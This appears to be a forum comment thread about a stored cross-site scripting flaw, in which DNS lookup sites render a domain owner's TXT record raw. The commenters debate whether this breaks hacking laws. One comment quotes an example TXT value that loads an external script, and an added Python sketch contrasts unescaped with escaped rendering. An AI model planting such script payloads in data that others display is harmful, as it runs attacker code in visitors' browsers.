
Isn't this technically illegal to demonstrate haha?



Why on earth would it be illegal?


I don't think it makes any sense for this to be illegal, but I can point to at least one example where sense didn't necessarily dictate "justice": http://www.ehackingnews.com/2013/12/anonymous-hacker-charged...


What SHOULD be illegal is not sanitizing all inputs.


Damn, that got downvoted into oblivion haha. Honest question...

Although I don't believe it should be, a third party injecting JavaScript to demonstrate an exploit might be...


Anybody saying "this is illegal" should be required to cite the law they think is broken and explain why the act in question violates that law.


He hasn't injected anything. It's just his public DNS record that this page has chosen to display without sanitizing.


I imagine the UK Computer Misuse Act (e.g. at Section 3, http://www.legislation.gov.uk/ukpga/1990/18) probably covers it if the person who altered the TXT field does so to cause websites to load code on purpose, that purpose being for example to impair (Section 3(2)(a)) the running of the computer [causing Rick Astley to play, defo counts!] - but it can be read to cover pretty much anything.

Similarly I imagine something like the CFAA (18 USC 1030) probably has broad enough clauses to make this sort of action technically illegal, at least in some cases? But I'm out of my depth on that one.


At least the UK has something somewhat specific (and actually fits XSS quite well).

CA 502c just says: "(3) Knowingly and without permission uses or causes to be used computer services" amongst other very broad subsections

http://support.piercecollege.edu/1521a/References/California...


So do you want to make it illegal to set the contents of your own domain's TXT record to:

"<script src='//peniscorp.com/topkek.js'></script>"

Because that is all this is.


What a bunch of nonsense. TXT records were intended for arbitrary use. Why in the world are these companies pulling data from unknown sources and dumping it RAW into their output? Wow. Good find, IMO.

[1] http://tools.ietf.org/html/rfc1464
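Added example, not part of the thread and not any lookup site's code: a Python sketch of the display bug the comments describe, showing TXT RDATA parsed from its wire format and rendered into an HTML table row raw versus encoded at output. The function names, the `example.invalid` domain and the sample records are assumptions constructed for illustration.

```python
import html


def parse_txt_rdata(rdata: bytes) -> list:
    """Split TXT RDATA into its length-prefixed character-strings (RFC 1035, 3.3.14)."""
    strings, pos = [], 0
    while pos < len(rdata):
        length = rdata[pos]
        chunk = rdata[pos + 1 : pos + 1 + length]
        if len(chunk) != length:
            raise ValueError("truncated TXT character-string")
        # TXT data is arbitrary bytes chosen by the zone owner: decode
        # leniently and treat the result as untrusted text, never as markup.
        strings.append(chunk.decode("utf-8", errors="replace"))
        pos += 1 + length
    return strings


def render_row_unsafe(name: str, rdata: bytes) -> str:
    """Raw interpolation: the record content becomes part of the page's HTML."""
    value = "".join(parse_txt_rdata(rdata))
    return f"<tr><td>{name}</td><td>{value}</td></tr>"


def render_row_safe(name: str, rdata: bytes) -> str:
    """Encode at output, after the character-strings are joined for display."""
    value = "".join(parse_txt_rdata(rdata))
    return f"<tr><td>{html.escape(name)}</td><td>{html.escape(value)}</td></tr>"


def _txt(*parts: bytes) -> bytes:
    """Build TXT RDATA from character-strings (helper for the constructed samples)."""
    return b"".join(bytes([len(p)]) + p for p in parts)


# Constructed sample records (not taken from any real zone).
SPF = _txt(b"v=spf1 -all")
# A TXT record may carry several character-strings; display code joins them.
MARKUP = _txt(b"<script src='//example.invalid/", b"x.js'></script>")

if __name__ == "__main__":
    for rdata in (SPF, MARKUP):
        print("unsafe:", render_row_unsafe("example.invalid", rdata))
        print("safe:  ", render_row_safe("example.invalid", rdata))
```

The encoding is applied to the joined value at the point of output, so the stored and displayed record stays byte-for-byte what DNS returned while the browser sees only text.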


Those DNS lookup sites are pulling his information and putting it on their sites. He didn't ask for those records to be published!


Ah, so his TXT records actually serve a genuine purpose? ;)


In which country's jurisdiction?



